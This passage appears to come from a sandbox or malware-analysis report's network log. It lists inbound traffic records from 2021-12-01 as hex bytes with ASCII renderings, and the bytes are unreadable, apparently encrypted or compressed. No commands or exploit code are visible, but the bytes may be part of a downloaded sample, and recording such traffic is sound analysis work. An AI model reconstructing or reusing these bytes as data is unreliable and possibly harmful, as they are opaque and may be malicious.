94 e1 97 67 e1 1b 66 0f a6 bc 6e 7f bc 98 f9 3b 87 5a c3 d1 2a 64 8d ce a4 75 f6 eb b5 0e Data Ascii: EkQy{RMIDsL'#wIMej1D18zrc>\YQ.?n+5K;LCYTrl9c.8oi)HyD>Vspdn2;4h'>)c0U3Uw\|[(s)/Nkt1)(Lqgfn;Z*du
2021-12-01 18:26:22 UTC	282	IN	Data Raw: f8 99 66 5d c1 19 a8 e8 13 f0 e6 01 e3 f2 3a f2 44 93 60 56 21 d0 75 90 77 7e 1d dd e8 a1 17 f7 3a f3 5f 19 0e ba ca 24 4c de 3f 88 26 49 d5 7c 51 4c 3f b6 a5 82 50 db 5a 2d a3 ff d2 55 1a c9 e2 cd c7 de 18 37 d1 bd 51 4a 5b 19 7a 02 78 c2 46 e3 ac 49 e5 a9 3d a8 ae b3 e2 e8 f0 12 d8 e3 08 0b dc 8a 27 f3 a0 85 86 24 4e 3f e8 6b 1b 3f f7 10 29 fc 12 d0 30 c6 b6 d2 8c 6d c3 fc bd 16 bf 82 a1 32 c0 6a dd b8 f0 12 a7 62 19 c7 30 7d 15 e7 9b 9b cc 78 fd 59 bb 82 8f 23 5e 4a bc 54 ab 15 f4 f4 00 a1 fa 3e 44 fe 73 c7 8e 09 53 69 84 19 37 90 68 22 6c 85 85 8e f7 c1 d8 26 75 26 ce f2 50 96 3b 91 08 16 9c 46 c4 85 a4 3f e0 83 35 db bd 80 8b 69 da 80 e6 af fa 02 2e 23 80 4b 90 b6 6e ab fa dd af fb 53 0c cb 6d 81 ce 17 55 b6 d5 59 39 8a df 46 e8 5f 9f 11 1d 67 fe 61 Data Ascii: f]:D`V!uw~:_$L?&I\|QL?PZ-U7QJ[zxFI='$N?k?)0m2jb0}xY#^JT>DsSi7h"l&u&P;F?5i.#KnSmUY9F_ga
2021-12-01 18:26:22 UTC	283	IN	Data Raw: 3e 16 9a 7d d7 6c 03 ad 05 dc 60 ab 22 ff f7 ae 30 bc d9 04 75 17 ef a2 6a e1 98 4b 7f 46 84 c8 75 ee b1 cf e7 39 93 21 6a 45 36 e1 89 0d 96 31 c9 92 74 9f f3 8a 63 e1 a8 3e 40 48 b7 d3 2d 5c 44 88 03 12 99 e9 95 aa 26 fd 91 f0 48 2c 97 f7 16 0a 39 34 77 4c 05 ab 65 01 81 d8 69 1b 4a 83 44 dc 06 86 b3 2f 89 04 ad a2 eb 27 0d 50 6a 4d f4 ca 58 27 33 2a 48 1b 53 bf ad 5d 29 90 bb 29 34 72 89 d5 06 b9 2d 99 29 a3 68 a9 e2 6a db 0b 2a ff c9 5b bc 64 6e 33 37 42 1a 9a f1 e2 4b d8 a9 af 8b 74 80 ac a9 b5 ee 45 76 60 4c 86 08 ce bd 1a 6e 8b 12 c4 9c 6f fd 27 e4 f7 29 cb f0 a9 34 34 f1 31 b7 f4 ed 21 22 20 28 64 32 5d fc 8c f0 6b 6e 38 7a b7 7e ca 8f 86 33 20 ca fd 46 1d 25 96 51 1b 99 37 84 ed 4f f4 97 90 17 9f f7 93 2b ca f8 ac cd e1 db 2e 68 10 02 95 0c 18 3e Data Ascii: >}l`"0ujKFu9!jE61tc>@H-\D&H,94wLeiJD/'PjMX'3HS]))4r-)hj[dn37BKtEv`Lno')441!" (d2]kn8z~3 F%Q7O+.h>
2021-12-01 18:26:22 UTC	285	IN	Data Raw: ed b6 24 8a 43 e2 32 d4 56 f3 29 40 68 1a 21 28 3b e5 0e 42 65 41 77 48 6c c7 28 f7 10 68 71 bb 57 e4 d1 b6 d2 c5 78 29 03 5c 52 34 81 e0 9f 34 22 56 73 b5 97 6e 2e 76 57 71 72 a3 e3 93 43 e8 30 70 10 ba ca 0c c9 5f 3f 53 bf 9d 5d 79 3a 01 c9 05 2b 9e f7 73 a9 e7 82 a0 28 0f cd b4 6e 4d 55 77 cd e6 48 b6 ce 6e a2 72 2a d6 f2 50 f3 b0 6a 8f 68 84 62 c4 cc a7 f0 1f 46 c9 b2 12 5a c2 6a 04 05 0b db c0 46 a5 b7 a4 b3 90 b6 6e 1e 9c 6e 50 6d 1b 54 57 3b 69 a1 17 26 c3 bd e1 59 8a ab c6 5f 7f 80 72 b2 26 9f d7 fe 44 9e 6c 43 46 85 c9 e3 1b 5a 3f bd f1 b3 5e 40 49 85 94 6a a6 3a 4e 5b 86 26 3b 0a 47 93 5c ae f4 73 b6 28 51 0f 19 2b 2c ac 6d b9 29 f3 a8 6e f0 cb 15 54 be 03 b2 ea 56 6a d0 a4 d9 4b 20 a6 50 f6 89 20 5e aa 60 95 d5 b6 89 79 1c 5b da e5 9a 2e 11 b7 Data Ascii: $C2V)@h!(;BeAwHl(hqWx)\R44"Vsn.vWqrC0p_?S]y:+s(nMUwHnr*PjhbFZjFnnPmTW;i&Y_r&DlCFZ?^@Ij:N[&;G\s(Q+,m)nTVjK P ^`y[.
2021-12-01 18:26:22 UTC	286	IN	Data Raw: 6d 40 e6 ba 50 e9 aa 0c 3e a5 c7 60 5d c2 c0 3f d3 80 77 4a 80 a8 4c df 66 2b 04 0f 8b 5b 8e 84 28 00 55 a8 96 e0 f4 1b e1 59 cc c7 96 26 fb 61 6a b3 ef cb c2 68 74 af b7 fe 5d 1e c2 23 b3 c9 c9 0b 41 4e 24 dd d0 fc 08 8d dc e7 93 0f de c0 19 c5 b5 ee 16 34 31 37 5c ca 98 02 7f 2f e5 e9 ec cb 14 39 ca ae 4b 29 09 f5 73 01 5d ab e9 5a b3 5e 45 47 73 d4 57 5d 3c 2d 5c bb f7 00 4b 13 6c 4b bf e9 5e d0 04 14 93 32 79 c1 bb 77 70 43 df a0 32 4f f4 97 18 56 96 f8 25 af ee 10 ac cd e1 bd e9 29 1a fd 75 44 93 b2 15 6b cc 0b a0 71 a2 47 94 58 42 65 7d 77 ed 87 95 aa 9e 3e aa e6 6f 75 7b 46 34 37 d9 95 46 64 ae a1 f6 c9 11 84 9a ae 26 7d 0b f1 54 10 4f 1a 1a 21 92 55 fe e9 3c 80 cf eb e3 af 5f cf af 8d cd 57 f7 ab 93 a7 9a 28 b1 d5 ee 0f 10 d7 e0 1d 16 be 29 d6 2f Data Ascii: m@P>`]?wJLf+[(UY&ajht]#AN$417\/9K)s]Z^EGsW]<-\KlK^2ywpC2OV%)uDkqGXBe}w>ou{F47Fd&}TO!U<_W()/
2021-12-01 18:26:22 UTC	287	IN	Data Raw: 73 c7 41 46 b4 eb 8c 21 fc ed 29 71 6f cd 5f 04 c1 e8 69 f1 27 7c 81 c1 a6 3f 92 19 8f 12 3d 0f 33 ce df 79 5b 46 a2 20 22 5e c2 6a bd 5d af 88 25 cf e1 93 84 5b 96 b2 6e 42 25 33 b1 8e d8 bc bf a1 93 cd 17 55 7a 7d 50 63 1e 56 82 27 53 3f 9e d8 26 f1 6e a9 44 6f f9 bd 02 d2 f9 2b c5 17 3f e9 7a 37 d5 47 6d ac 1f 60 9a 4b b6 b7 fa 6c 2b ff 78 95 19 cb f4 75 b1 68 91 8f a1 47 2c c2 d5 a9 28 a4 a8 61 c9 e2 11 45 50 9a f5 a5 57 6c 38 ab 6e 1c 26 a9 e7 b1 9d cb 8c aa 42 7c 9a fe 8a dd 9f 0c de 81 11 43 64 de 75 68 a3 0c d3 57 ff ce 1e 20 6c 72 77 47 bc 63 a7 18 2b d7 ea e8 f0 64 04 ce 2a ae 80 5b 8b 63 10 a2 f1 a1 03 1c 25 82 eb 38 b6 5c 75 b8 ce 93 be a5 e1 9f 5b 23 b0 31 7e 7e ec 3f 57 fd c3 73 b8 fe 3e 67 83 02 99 4b 0a 9c 19 b1 4d 4a 00 ad cc e4 2c 82 83 Data Ascii: sAF!)qo_i'\|?=3y[F "^j]%[nB%3Uz}PcV'S?&nDo+?z7Gm`Kl+xuhG,(aEPWl8n&B\|CduhW lrwGc+d*[c%8\u[#1~~?Ws>gKMJ,
2021-12-01 18:26:22 UTC	288	IN	Data Raw: 7a 39 d3 30 8f ea 67 1a 6a 8b 9a 85 67 9f 4b a3 78 2c 29 cb f0 21 75 31 be 87 33 d0 31 21 22 20 a0 25 34 52 4a 08 d4 b6 6e 38 7a 3f 3f cd 80 30 b7 04 14 fd 46 1d ad d7 59 14 2f b3 68 32 4f f4 99 07 ec 98 f8 91 a6 23 31 14 cc ad 70 c8 7d 72 94 06 64 e3 c0 7a 0c be 6a cd 51 c1 26 fa 36 2d 11 5d 15 88 a7 e7 df f0 1e c3 88 4f 31 34 15 14 5a b6 f1 23 4a a3 ac fc ed 11 84 9a ae 26 7d 0b f0 4f ec ae 5f 60 b3 20 10 84 7b 8e c5 b5 79 51 8f 43 4c 1c cd 9b d5 45 ee 99 17 28 67 e7 57 5c dc ba 5d 53 59 ec 0f 9b 05 85 35 d0 27 8f 12 30 7c 62 f4 f3 a4 98 f3 d3 87 de 26 eb 7f 1a b5 68 2d 22 be ff 6e fe 15 6e ce 74 d8 38 54 a9 0b a8 7f 22 fd 8c d5 21 e9 d0 1f e0 e9 84 92 f2 38 d3 07 6d ae 0e a2 24 71 ec 92 3c 90 91 cc c9 e8 e2 48 e3 5f 19 8b 47 c5 a0 f0 fe 3f 88 6e 2a 13 Data Ascii: z90gjgKx,)!u131!" %4RJn8z??0FY/h2O#1p}rdzjQ&6-]O14Z#J&}O_` {yQCLE(gW\]SY5'0\|b&h-"nnt8T"!8m$q<H_G?n*
2021-12-01 18:26:22 UTC	290	IN	Data Raw: 8e cf 8c 60 bf 03 02 ca 3b 29 dd f8 ac f9 ef 5e 03 49 78 d9 0f 59 0d b2 b4 c3 5b b2 00 43 46 9a cf 7d 7c ba df bc 69 9c 69 d3 3d 92 6e 6c 5c f7 5c ae 2e f0 6d 7c 7c b2 5a 51 19 d0 a4 d9 c0 65 5e 0f ad d7 c5 bb 83 a2 e1 d5 25 fc 01 e3 00 ca d7 ca bd 04 d3 46 2f 8b b9 5b b1 e3 08 35 e6 af f9 4b 08 b1 87 e8 3e e6 f4 43 56 42 c3 ca bb a2 49 04 a9 2d bb 8a fd b1 d3 77 66 6c db 14 df e9 65 36 fd 0b 0e 5e e2 b3 19 eb 24 9b 65 99 0b d4 b4 a1 a3 00 ad a3 a0 4a 74 56 b6 40 b1 ba 9c 9b cb d2 f4 b8 28 03 06 66 ca 5f e6 8a 2c 7f 1f 33 a6 d0 d9 de e7 01 53 b4 fb 09 2c 8b 31 31 df d5 3c 40 2e 6f 9d 1d bb 04 07 bb 6f 65 6c 3c 31 3d 79 04 14 3a f5 46 0a 1d 42 cf ee e9 00 d4 fe 1e 77 ac 57 46 57 3f e6 12 2d f0 d6 c4 07 67 08 4c 32 7e 59 43 24 43 26 e4 74 24 dc 9f 4e d3 9c Data Ascii: `;)^IxY[CF}\|ii=nl\\.m\|\|ZQe^%F/[5K>CVBI-wfle6^$eJtV@(f_,3S,11<@.ooel<1=y:FBwWFW?-gL2~YC$C&t$N
2021-12-01 18:26:22 UTC	291	IN	Data Raw: 14 6a cd 0a a1 70 a3 46 95 59 43 64 7d 77 8b 17 73 be 9e 2e 42 f2 6f 65 7b 46 34 36 d8 94 47 65 af a0 f7 c9 10 85 9b af 27 7c 0a f0 55 11 4e 1b 1b 20 93 54 ff e8 3d 81 ce ea e2 ae 5f df c9 1d c5 52 f7 bb c5 91 9a 38 9d c5 ee 0e a8 c7 e1 1c 97 9c 28 d6 97 59 63 62 f4 81 83 ae 70 65 41 e1 e3 60 60 d4 b6 44 82 3b 61 26 db 2c 22 be 99 fe 9f 00 6e 8e 5a cd 38 08 a8 0e a8 f5 a0 2f d1 d4 20 e8 d1 1f e1 e8 85 73 f3 3b f3 0d 6d a1 1f a3 29 70 ed 93 37 91 90 cd c8 e9 e3 59 f9 5f d5 47 02 4e 4c a3 55 62 9c 38 a1 66 28 8d 70 0e 81 aa db b4 24 2f 35 b1 22 51 eb 60 77 99 df 6f f9 18 27 19 73 c5 4e 01 0c 75 87 9a c1 89 1c 2b 41 c9 ed b9 a0 2b 43 e2 e8 73 2d fb 29 4f ec 8d cf 0c 3b 6e 49 46 03 c2 b1 20 63 42 a2 f7 10 68 11 1d 2f e6 be b9 57 ba 6e 0c 03 3a d1 4c 85 81 cc Data Ascii: jpFYCd}ws.Boe{F46Ge'\|UN T=_R8(YcbpeA``D;a&,"nZ8/ s;m)p7Y_GNLUb8f(p$/5"Q`wo'sNu+A+Cs-)O;nIF cBh/Wn:L
2021-12-01 18:26:22 UTC	292	IN	Data Raw: 76 2f 9b e7 d0 54 be ca 25 e6 63 35 87 c4 7d 4b 24 f2 2a a2 09 65 b4 40 30 9e d5 7d 0b 1f af 5b 9b fd a1 2c 53 e3 a8 ca 14 cf 64 14 76 76 cd 50 9d 6f c2 5d 60 e2 c5 a6 14 7a 84 3f 67 fd c3 20 d2 fe c1 b2 08 75 cd c0 d2 17 5d 95 11 79 c9 24 88 c0 38 09 50 f9 8a bb 6e 1f 23 38 c1 d9 ce 4b 10 53 a4 41 18 2c 9b 82 20 df c5 99 51 2e 7f 20 0c bb 14 07 ba 6d 63 6a 3a 37 3b 7f 02 12 39 f3 40 0c 1b 44 c9 e8 ef 06 d2 f8 18 71 aa 51 40 51 39 e0 14 2b f6 d0 c2 03 62 c4 80 fe b2 95 8f e8 8f ea 28 22 6e ef 69 cd 29 b9 79 4a 79 71 90 45 cb 7b 69 ec 1a 70 00 3e ab 2a 64 bb c3 f0 16 99 a5 fe 21 aa 37 63 f0 48 2c f8 7a 5a 3a 2e 3b c1 24 02 92 df 38 a2 d8 69 5f c1 c7 60 2c e2 87 5a 17 f2 05 25 e3 e9 28 bb 30 4e 00 7c f1 5b 0c 85 6e 6c 20 db da de e0 4c 95 2b b9 a4 e2 4f 94 Data Ascii: v/T%c5}K$e@0}[,SdvvPo]`z?g u]y$8Pn#8KSA, Q. mcj:7;9@DqQ@Q9+b("ni)yJyqE{ip>d!7cH,zZ:.;$8i_`,Z%(0N\|[nl L+O
2021-12-01 18:26:22 UTC	293	IN	Data Raw: 64 5d 1b 98 ec a2 d9 14 16 33 89 8d 0f 5c f2 86 6b b3 1d 40 42 b4 4e 4d da 96 00 99 28 49 cb 65 9e 15 20 8f 2e db 80 c0 40 b4 b4 4d 86 be 7a dd ce fd 17 81 1d cd 32 61 aa 22 c3 5b 02 89 ff 54 fc e8 ec b1 85 8e 36 8a 62 3e fe 25 ab 9a 83 bd 57 ed 03 4b 60 15 b7 e6 18 ef 4e d5 d7 bd 2e 00 81 1b 6b 2e 74 0c 0b e4 1d f8 3f 17 fd 57 b3 a4 99 6b 09 76 67 a4 fb 6f 24 ad 98 d0 91 15 a4 73 c5 d6 fd 5c d3 09 7c 1c 68 ba 7f 4f ac 60 24 0a 61 f1 01 00 a9 5b ca 32 1d 05 f0 6d 97 b2 de b7 a8 0f 7f 2e 31 3b 57 f3 8f ca 7e 44 22 5e d6 f8 03 2c 32 24 1c 5c d5 d0 b1 2d c0 3a 50 30 9a ea 30 ba 3a 5c 26 cd f4 29 00 86 29 c3 25 0b be d7 53 e7 fe f0 c5 59 7a a8 c7 1a 28 31 27 bf 8f 3e df a2 0b c5 17 59 e8 ff 5a f7 90 3d af 32 a4 66 e4 f0 d5 95 6e 17 db bb 42 3f a6 2f 7c 60 68 Data Ascii: d]3\k@BNM(Ie .@Mz2a"[T6b>%WK`N.k.t?Wkvgo$s\\|hO`$a[2m.1;W~D"^,2$\-:P00:\&))%SYz(1'>YZ=2fnB?/\|`h
2021-12-01 18:26:22 UTC	295	IN	Data Raw: f9 8a db 6e 1f db 38 c1 d9 ce 1b 10 53 80 41 18 2c 9b 82 20 df c5 99 51 2e 7f 20 0c bb 14 07 ba 6d 83 4a 3a 37 27 7f 02 12 39 f3 40 0c 1b 44 c9 e8 ef 06 d2 f8 18 71 aa 51 40 51 39 e0 14 2b f6 d0 c2 03 62 c4 80 fe b2 95 8f e8 8f ea 28 22 6e ef 69 ed 29 b9 29 4a 79 71 90 45 cb 7b 69 ec 1a 70 00 3e 8f 09 64 bb 9d d3 16 99 e9 dd 21 aa d9 41 de 3c 49 a3 0e 5a 2e 0d 7d c0 08 21 92 cf 04 81 d8 6b 5f c1 c7 64 e8 c0 87 5a a7 d0 05 25 e3 e9 28 bb 14 4e 57 7c 8b 3b 06 f7 0a 0d 54 ba fe a9 74 4d 95 2b b9 84 e2 4f 94 29 29 d2 8c a5 a7 68 a9 aa e1 97 2f 6a b7 42 df 98 bc 6e 73 37 24 9d b5 c9 3e a2 ed ca a0 3d d4 a4 75 a9 b5 be cd 37 63 41 30 8c ea 4b 1a 6e 8b 9a 85 98 60 4b a3 c0 2c 29 cb f0 61 75 31 be a9 41 a3 43 42 22 20 a0 dd 34 52 4a 08 b4 b6 6e 38 78 3f 3f cd ae Data Ascii: n8SA, Q. mJ:7'9@DqQ@Q9+b("ni))JyqE{ip>d!A<IZ.}!k_dZ%(NW\|;TtM+O))h/jBns7$>=u7cA0Kn`K,)au1ACB" 4RJn8x??
2021-12-01 18:26:22 UTC	296	IN	Data Raw: 38 da 8f 7b 9d 21 a6 b8 db 09 2d ad 74 40 14 41 7f 31 ca 2a c9 4a 37 d5 36 81 cd b2 0e 13 02 52 c1 fb 1c 22 c2 85 ed d9 24 ec 43 96 e8 ac 56 b0 29 2f 68 74 cf 78 3b 97 0e 2d 65 2d 89 4c 6c 97 28 96 10 06 77 fb 57 88 d1 ea d2 c5 6e 0c 03 5c 52 34 81 e0 b9 11 22 56 73 b5 97 6e 16 fc 10 c1 2c a3 e3 93 13 c0 30 70 10 46 ca 0c c9 a3 1f 53 bf 61 5b 79 b8 63 8a 51 67 9e e7 73 c7 84 83 a0 28 21 b9 d1 16 39 71 1a a3 e6 48 b6 ce 6e 82 72 2a 86 f2 50 d7 9e 74 eb 73 f0 27 e0 f9 a7 f0 1f 62 ee e8 36 5a 6e 6a 04 05 25 a9 a4 27 d1 d6 a4 b3 6c 96 6e 42 60 23 50 04 35 45 33 28 1d af 33 2f b9 a8 85 5d ed df c6 03 87 f6 72 db 1e f1 d7 9a 6a 89 08 55 32 97 c9 c3 2b 36 3f e9 6d cd 5e 03 67 95 f0 79 d2 29 4e 3e 4a 0c 3b 7e 6f c5 5c cb da 68 d2 3a 25 07 3d 76 2c c2 6d e5 dd e0 Data Ascii: 8{!-t@A1J76R"$CV)/htx;-e-Ll(wWn\R4"Vsn,0pFSa[ycQgs(!9qHnrPts'b6Znj%'lnB`#P5E3(3/]rjU2+6?m^gy)N>J;~o\h:%=v,m
2021-12-01 18:26:22 UTC	297	IN	Data Raw: 79 3b 54 71 90 d3 e6 7b 69 5f 37 70 00 d6 a2 09 64 a8 b3 d3 16 a3 c7 dd 21 d1 f7 41 f0 f4 02 db 7a b9 00 0d 3b cd 27 21 92 e6 2b 81 d8 0f 70 c1 c7 ed c7 c0 87 98 88 d0 05 cc cc e9 28 ab 24 4e 77 49 bb 5b 28 df 5e 6c 20 58 ce a9 9a c2 a5 2b b9 6d d2 4f 94 e1 19 d2 8c b6 96 68 a9 9e d0 97 2f 35 86 42 df 12 8d 6e 33 8e 15 dd 9b 51 6b c3 99 ac 92 3d f0 94 47 a9 b5 bd ff 37 63 33 02 8c ea f8 28 6e 8b 24 b7 98 60 96 91 c0 2c d3 f9 f0 21 58 02 fe 87 57 e3 31 21 b1 13 a0 25 80 61 4a 08 35 85 6e 38 74 0b 3f cd bf 04 b7 04 64 c9 46 1d 3c e3 59 14 93 87 a0 32 aa c0 97 18 5c a3 f8 25 80 db 10 ac 83 d4 bd e9 56 2f fd 75 e4 a6 b2 15 a2 f9 0b a0 81 97 47 94 7d 74 65 7d 3b db 87 95 db a8 3e aa 72 59 75 7b fd 02 37 d9 7d 70 64 ae b4 c1 c9 11 c4 ad ae 26 18 3c f1 54 92 78 Data Ascii: y;Tq{i_7pd!Az;'!+p($NwI[(^l X+mOh/5Bn3Qk=G7c3(n$`,!XW1!%aJ5n8t?dF<Y2\%V/uG}te};>rYu{7}pd&<Tx
2021-12-01 18:26:22 UTC	299	IN	Data Raw: 75 0c 06 1f d4 ee 3d 79 26 39 15 25 a3 b0 f6 7d a9 74 02 79 cc af 7e 84 3a 4c 20 de fa 38 79 cf 4d a7 68 46 fa d9 20 a2 ac e6 e4 5a 66 bb d1 1c 00 30 04 be 87 2f d3 ce 39 ed 25 6b a6 82 15 af d9 69 8f 65 ed 28 a9 a1 c3 de 48 2d e9 89 46 2a 87 12 6d 71 0b ba b5 3e e2 d2 d0 f7 f5 c0 2d 23 ec 50 11 04 6c 5e 39 24 04 aa 39 34 b6 aa a6 5a fe 9b a3 75 3c b6 02 a8 67 f1 b6 ef 3c b6 09 40 02 93 bf 80 7a 64 4c be f1 98 37 6d 24 9d f0 36 c7 3d 36 79 e3 3c 7f 1b 31 86 3d bb 87 56 b6 3a 24 1e 5e 21 58 8c 18 88 6d c1 de 74 f0 d2 7c 5e d3 01 d6 b3 37 6c a8 e3 bc 3f 6e d3 3d b2 ec 38 2d de 01 84 ad 9d ec 61 4a 1a b6 f4 f7 27 11 ac 1f 41 f6 8a b4 7a df bf 5d a1 06 41 d1 ab 11 3e 49 97 2a c3 7c 1d fb 35 44 d3 b0 0e 78 7e c8 3e 9b 8a c8 42 3e 8e cc e4 75 ba 1c 5b 03 02 80 Data Ascii: u=y&9%}ty~:L 8yMhF Zf0/9%kie(H-Fmq>-#Pl^9$94Zu<g<@zdL7m$6=6y<1=V:$^!Xmt\|^7l?n=8-aJ'Az]A>I\|5Dx~>B>u[
2021-12-01 18:26:22 UTC	300	IN	Data Raw: 6b 68 d2 fb ca c9 05 c4 ce cf fa 4c 03 e4 27 b1 fc ff 01 5e 5a 45 b3 ff f8 5a ae fa c2 f3 58 9e c0 36 c6 d8 83 ac 59 07 14 30 fb 83 09 77 03 ef b4 e8 fb 09 18 c6 ae 48 6a a4 9d 4c 14 5f 9a d0 33 bd 52 48 71 45 ce 41 67 26 38 61 ba d1 2f 38 0d 56 51 a0 ed 54 99 69 77 94 15 78 c3 b3 0a 60 5d da ce 55 0e f4 fa 7b 3f c5 9d 4b cb bd 64 de a4 8f da be 29 6d 94 1b 29 fe d6 3b 06 af 62 f3 14 cc 23 c7 2c 30 0c 13 10 ba 87 f8 c9 f7 6d cf 92 2b 07 12 30 51 45 9d f4 32 05 ae d6 9f a7 7c e9 fe 80 4b 1e 62 a2 31 64 0b 68 73 57 f7 27 ba 88 48 e1 cf 86 80 c6 0c ba db d4 88 22 9b cf b3 f6 f5 4b 9d b2 87 61 c4 ab 84 33 fb fe 40 85 f3 2c 3b 0a 90 ec e6 ff 03 0b 23 e0 8f 08 05 bc f4 2a ed 54 05 44 ae 2d 55 d7 91 03 93 71 40 f3 58 bc 51 5b c7 60 c6 91 c2 5a d0 b8 48 8d b9 5b Data Ascii: khL'^ZEZX6Y0wHjL_3RHqEAg&8a/8VQTiwx`]U{?Kd)m);b#,0m+0QE2\|Kb1dhsW'H"Ka3@,;#*TD-Uq@XQ[`ZH[
2021-12-01 18:26:22 UTC	301	IN	Data Raw: bf a9 09 d0 c3 e8 dc fe d1 23 31 fb 23 27 6d 75 5a 3a 2d 47 a3 7e 31 aa 9d 94 4b c6 b0 a8 64 32 a4 15 db 4b 98 b3 f3 0b 84 18 79 23 85 ba a2 7c 71 3f 9e 98 81 33 6e 2d de f9 71 c2 21 01 4b f2 05 5e 0d 34 a4 3b ae f4 6c df 3f 38 29 6c 30 63 b2 08 8b 29 d3 c1 69 9d c8 71 1e d3 05 d6 f4 19 6c a4 eb a9 2e 4e a6 3d 9f ed 27 11 ab 14 a1 a7 bf f9 74 6e 10 92 e4 fb 26 74 a9 76 58 f2 89 bd 39 da e4 48 8f 07 5c c8 b1 09 1b 56 97 5a c3 7b 00 fc 25 51 fa b0 0f 0b 72 c6 3f f2 b2 d4 58 01 86 db af 60 cf 13 7d 18 1b a0 34 b3 02 ab 39 09 ad b0 d2 46 1f f7 5a 13 fd ae 49 b6 97 8e c7 7c 26 a8 b4 84 78 31 e0 7c 1c c9 53 e1 ae 55 64 34 d7 e7 d2 0a 76 6c 4d b5 8a ab 3f 46 3c c8 34 75 49 9b ef 49 bb ac d6 24 5a 2c 48 63 c9 60 4a c9 0a 63 1d 53 59 56 12 66 3c 54 9a 24 65 54 31 Data Ascii: #1#'muZ:-G~1Kd2Ky#\|q?3n-q!K^4;l?8)l0c)iql.N='tn&tvX9H\VZ{%Qr?X`}49FZI\|&x1\|SUd4vlM?F<4uII$Z,Hc`JcSYVf<T$eT1
2021-12-01 18:26:22 UTC	302	IN	Data Raw: 64 d6 77 7f bf 2a 72 ce bc 59 63 46 dd cd 5f 2b da fa 75 02 f7 8b 4e ed 82 7f cf a6 e1 d0 84 7d 7b 8e 1e 07 e1 d7 74 1f a9 0b d7 18 cc 2a f9 3c 6c 08 10 23 8c f4 fe e9 ec 5b cb 92 0a 75 16 2b 60 56 aa fe 15 0d c9 cf 97 a5 11 f3 f3 c0 4b 10 6f df 39 7d 1b 7b 69 4a c1 3c 99 87 5d ec cf 86 8e fb 3e ac c4 d4 88 22 9b cf e3 f3 f3 46 f0 a8 8a 21 c4 ab b4 7c e5 f6 70 bf f3 34 06 63 98 ed eb c0 30 00 36 81 8c 02 04 d5 c0 2c ed 57 0d 43 f4 40 4f d7 90 2f 9a 63 0f f0 52 bd 38 75 c5 67 c7 b5 d2 4d b5 bb 45 e9 a7 76 8e 84 e9 16 dc 57 9f 65 03 e1 6d c1 4d 1f 88 92 5b fd f8 a3 8a 84 8d 2b 9c 5f 6e e2 39 a8 cd 94 f0 52 e5 07 45 50 54 b5 fc 1e 9d 4c cb d1 b4 19 5f 87 15 72 71 56 17 13 a4 00 c9 6f 5e fe 5b b0 a9 d1 63 17 6b 5e 82 fb 79 2c b6 93 ae de 51 e4 28 e2 85 9d 3f Data Ascii: dwrYcF_+uN}{t<l#[u+`VKo9}{iJ<]>"F!\|p4c06,WC@O/cR8ugMEvWemM[+_n9REPTL_rqVo^[ck^y,Q(?
2021-12-01 18:26:22 UTC	304	IN	Data Raw: df 66 86 c0 5c 5e f9 09 c6 d9 33 6f 93 c5 a9 38 77 a6 27 9f e7 23 33 ba 4e 86 b4 ac ec 5c 72 32 bf f5 de 27 67 98 17 5f e8 b0 d0 23 df bc 40 af 0d 72 e2 b0 38 39 56 9d 58 f6 6c 1d c0 01 30 e9 bc 13 66 72 cb 75 ec 9c d7 49 1a 8d ef af 60 8a 16 66 19 04 99 35 e5 1b 83 5d 17 83 b3 c3 5d 14 c3 5a 13 b8 b1 52 bd 8c 95 d7 70 01 9a c0 a5 7e 33 f8 7c 1d e7 53 e9 b6 5d 40 3e be ef cf 2b 6d 51 57 b3 8d ab 33 64 04 a4 36 79 5a fe cb 4e 98 a0 ed 18 6a 7f 57 65 d5 79 6a de 43 14 0b 4c 52 72 11 45 77 4d ba 04 0c 6c 25 bf 8d a6 68 95 9d 6c 3f df 3c 04 34 4f 93 14 5c 9f be af 6e 06 ea f7 9f c4 f0 c6 86 c8 8f 5c 6c 1b 82 2d a8 5f ca 79 3d 18 07 f5 0c a5 3c 0c 98 4a 1f 73 57 fb 60 0b d5 9d a4 7f f7 84 b0 45 84 ae 20 86 2d 65 b5 3d 3f 5a 5d 54 b2 61 55 fb b0 6a 81 af 08 29 Data Ascii: f\^3o8w'#3N\r2'g_#@r89VXl0fruI`f5]]ZRp~3\|S]@>+mQW3d6yZNjWeyjCLRrEwMl%hl?<4O\n\l-_y=<JsW`E -e=?Z]TaUj)
2021-12-01 18:26:22 UTC	305	IN	Data Raw: 73 74 4c ff 31 d0 9e 5d f6 aa a4 96 db 0c ba db dd 8d 26 8e c9 82 e7 f1 7a fc b1 8b 0f de a7 96 78 d9 e8 5d 85 f3 2c 34 0c 99 f5 ef ca 71 13 29 8e 8f 0c 05 fb c0 24 f5 5f 2f 52 ae 7e 47 ca a9 01 92 60 03 fb 31 af 59 6e cd 41 dd 80 f4 40 a0 a7 44 99 b1 6d 85 a1 e1 13 96 5f 80 0c 1b c9 70 cf 45 15 c2 e5 57 e6 f4 83 bc 9c b7 36 89 2d 7c fb 36 b7 c5 b8 bb 5e ec 0b 58 13 4f bb f9 1e d2 54 d2 ef a9 33 59 87 74 71 7d 7b 12 0b ae 45 be 79 41 f5 79 a8 b9 a8 7c 13 76 54 c1 89 34 08 c2 f6 ed b6 24 8a 43 e2 e8 f0 f6 b6 29 40 48 3a cf 0c 33 a0 0e 42 65 41 89 6c 6c c7 28 f7 f0 2d 77 9e 57 c4 d1 b6 d2 c5 6e 0c 03 5c 52 34 81 e0 b9 11 22 56 73 b5 97 6e 16 53 eb 34 72 a3 e3 93 13 cd 9e 35 10 ba ca 0c c9 5f f3 16 bf 9d 5d 79 b8 24 c9 05 2b 9e f7 73 c7 c2 da e5 28 0f cd b4 Data Ascii: stL1]&zx],4q)$_/R~G`1YnA@Dm_pEW6-\|6^XOT3Ytq}{EyAy\|vT4$C)@H:3BeAll(-wWn\R4"VsnS4r5_]y$+s(
